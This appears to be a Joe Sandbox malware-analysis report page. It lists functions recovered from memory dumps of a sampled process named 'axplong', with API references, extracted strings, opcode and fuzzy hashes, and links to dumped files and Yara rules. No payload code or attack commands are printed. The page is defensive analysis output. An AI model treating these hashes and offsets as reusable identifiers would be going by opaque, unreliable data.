Instruction Fuzzy Hash: 02225FB3F515144BDB4CCA9DDCA27EDB2E3AFD8314B0E803DA40AE3345EA79D9158A44

Function 00276F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 235410ce003547213eaf65aa7f429f0105d18a887f93027682836723cf0fb60c
Instruction ID: 8971215d49da4b0d9e04a1b1f3c462927305a3c664f48933e6cd5c1244aa91dd
Opcode Fuzzy Hash: 235410ce003547213eaf65aa7f429f0105d18a887f93027682836723cf0fb60c
Instruction Fuzzy Hash: 1AB15B31224609DFD715CF28C486B657BA0FF45364F69C658E89ECF2A1C375E9A2CB40

Function 00234AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2642f273be91b5f287e474e9fa697e2e961de028558a96645dc94c772d9d0475
Instruction ID: 58fc422741d7166f6d2f176e086e048fba49266c5b77b3f6b520cf861dca6bd7
Opcode Fuzzy Hash: 2642f273be91b5f287e474e9fa697e2e961de028558a96645dc94c772d9d0475
Instruction Fuzzy Hash: 4A51D27461D3918FC329CF2C811563AFFE1AF95200F484A9EE0D687292D774EA48CB91

Function 051E0388 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275839807.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51e0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0963a6bf3869f916e74baefee95bedc4386b65a6e12cf6528c9bd9eabfe657d7
Instruction ID: cd8bdfdbfd7668fd95b1350c6673c19e5466de5d051af5714e913779654c234a
Opcode Fuzzy Hash: 0963a6bf3869f916e74baefee95bedc4386b65a6e12cf6528c9bd9eabfe657d7
Instruction Fuzzy Hash: F421C2AB20C9506EB116D1653B28EFB6BAEE5CA730332846BF442C5402E3D94E4E9171

Function 0027777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3db2674181b680311a2379808bba41f10d0057de14bcfccbbb55dce44bda3e33
Instruction ID: 5e2140afc66373e8ba8ece82a7d2f8c4a919a45d529d78d7bc31328dc22bb53d
Opcode Fuzzy Hash: 3db2674181b680311a2379808bba41f10d0057de14bcfccbbb55dce44bda3e33
Instruction Fuzzy Hash: 3E21B673F204394B770CC47ECC5727DB6E1C68C541745823AE8A6EA2C1D968D917E2E4

Function 0027765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5edb2db77500fd24897288f5d5b1f515a012261449960758a790979e5d99d16d
Instruction ID: f97bf71c53f0f0b8bbedd3ce9cc27f06cfc09c493e34060b00493e73b2058388
Opcode Fuzzy Hash: 5edb2db77500fd24897288f5d5b1f515a012261449960758a790979e5d99d16d
Instruction Fuzzy Hash: 52117723F30C255A675C816D8C1727AA5D6DBD825071F533AD826E7284E9A4DE23D290

Function 00278720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: fa9d44ac8d5c91304ed70d29b0aa31cf549e48b03d6db9c647b36c99fc7a1932
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 1811067F2A014343D60C8E2DC8FC6B6E795EBC532173CC265C04B4B658D9329964D500

Function 0026645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9382490826ec6a3e925da110e3e4dff93bbd7e622597d5b2bf4e5d1f4c7f1664
Instruction ID: fd0e9586d71f2b4badf1187eccf57c30c9aa051a90b6dbac2db124616b117e47
Opcode Fuzzy Hash: 9382490826ec6a3e925da110e3e4dff93bbd7e622597d5b2bf4e5d1f4c7f1664
Instruction Fuzzy Hash: DFE08C31261648AFCE367F14C80CA893B2AEF12345F005804FC0856222CF65EDE1CD80

Function 0026A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: aa2aae2b8786c003234de30b6182417d1b141807f45706c85f2fdd7467e832ec
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: E8E0B672A25228EBCB15DB98894498AF2ACFB4AB50F554496B505E3251C2B0DF90CBD1

Function 00264770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 002647A7
___except_validate_context_record.LIBVCRUNTIME ref: 002647AF
_ValidateLocalCookies.LIBCMT ref: 00264838
__IsNonwritableInCurrentImage.LIBCMT ref: 00264863
_ValidateLocalCookies.LIBCMT ref: 002648B8

Strings

csm, xrefs: 0026484D

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 5ffce3826979c945b5d5e62f28cf7973e6608ef947a8fa3351a16ffb24b0be60
Instruction ID: 387aa7f1fda0071b9669c5b8f4a52c0ec0e91405135907b22a104bc8fdf49e37
Opcode Fuzzy Hash: 5ffce3826979c945b5d5e62f28cf7973e6608ef947a8fa3351a16ffb24b0be60
Instruction Fuzzy Hash: A151E934A202599BCF10EF68CC85A9E7BB5EF46318F148155E8449B392D732EEA5CF90

Function 002670C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0026710B

Strings

.com, xrefs: 0026714B
.cmd, xrefs: 00267129
.bat, xrefs: 0026713A
.exe, xrefs: 00267118

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: f6240a5ede55659126866d1baf7fa0c40843df5606fb3fd5bcaa535d6e83308d
Instruction ID: d55a2ae5b8e023e950c64f7566a68ce73b11714f7b8f4769377182305aa698d5
Opcode Fuzzy Hash: f6240a5ede55659126866d1baf7fa0c40843df5606fb3fd5bcaa535d6e83308d
Instruction Fuzzy Hash: 46012B7B6382132236192818BC0263B17889F83BB8B15002BFD48F73C1DE44ECE249A4

Function 00232E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00232F1F
__Mtx_unlock.LIBCPMT ref: 00232F8C
__Cnd_broadcast.LIBCPMT ref: 00232FA3
__Mtx_unlock.LIBCPMT ref: 002330B5
__Mtx_unlock.LIBCPMT ref: 0023315B

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: a18782fb9cdbedf0c6f12edec91abe03cfbd8c2cfbf7b77486c1ca2a98def469
Instruction ID: 22dceae905bf06ff04d24a78d1398f722d30a68a52ec8d6dfefc9c1b062c098c
Opcode Fuzzy Hash: a18782fb9cdbedf0c6f12edec91abe03cfbd8c2cfbf7b77486c1ca2a98def469
Instruction Fuzzy Hash: 3BA103B1921316EFDB19DF68C84476AB7B8FF15314F10812AE819D7641EB34EA28CBD1

Function 00232670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00232806
___std_exception_destroy.LIBVCRUNTIME ref: 002328A0

Strings

P##, xrefs: 00232811
P##, xrefs: 002327BE, 00232899

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: P##$P##
API String ID: 2970364248-3871474767
Opcode ID: 1a460490933fb6a9d3c18b4da4ee1560d3c2d5c7bf7fbe34ef8eea2a99c22438
Instruction ID: bea16b90435ab83de972bd08e264a0868ad189f870d85aafaee17cfad7439207
Opcode Fuzzy Hash: 1a460490933fb6a9d3c18b4da4ee1560d3c2d5c7bf7fbe34ef8eea2a99c22438
Instruction Fuzzy Hash: 45718171E20208DBDB04DFA8C881BDDFBB5FF59310F54811DE805A7285EB74A994CBA5

Function 00247870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

__Cnd_unregister_at_thread_exit.LIBCPMT ref: 0024795C
__Cnd_destroy_in_situ.LIBCPMT ref: 00247968
__Mtx_destroy_in_situ.LIBCPMT ref: 00247971

Strings

@y$, xrefs: 0024794A

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
String ID: @y$
API String ID: 4078500453-1294299836
Opcode ID: 8144eeaf78e22e55566c0e51a8676f7fb9281590ae699f05bd7f76a3d3baddc3
Instruction ID: 365b7b25e970a9450070977d4d61912e6a53d2a1c436f9b8ef6e8fa587ed6f3b
Opcode Fuzzy Hash: 8144eeaf78e22e55566c0e51a8676f7fb9281590ae699f05bd7f76a3d3baddc3
Instruction Fuzzy Hash: 703116B29243059FD728DF68D845B5AB7E8EF14310F000A3EE556C7241E771EA64CBE1

Function 00232AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00232B23

Strings

P##, xrefs: 00232B2E
P##, xrefs: 00232B18
This function cannot be called on a default constructed task, xrefs: 00232B03

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P##$P##$This function cannot be called on a default constructed task
API String ID: 2659868963-1295185000
Opcode ID: 3678bc1958b9615079f4ad2fd863e9f0e2ce924f52b7fc371a1106f31e2d657d
Instruction ID: a3f1c297562a6caf57920edfaadfa57801ddaf739c7775a41116b3f45dc0a3a7
Opcode Fuzzy Hash: 3678bc1958b9615079f4ad2fd863e9f0e2ce924f52b7fc371a1106f31e2d657d
Instruction Fuzzy Hash: B3F0F670D2130CABC714EFACE84199EF7EDDF15300F5041AEF80897641EB70AA688B94

Function 0026C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0026CA37

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
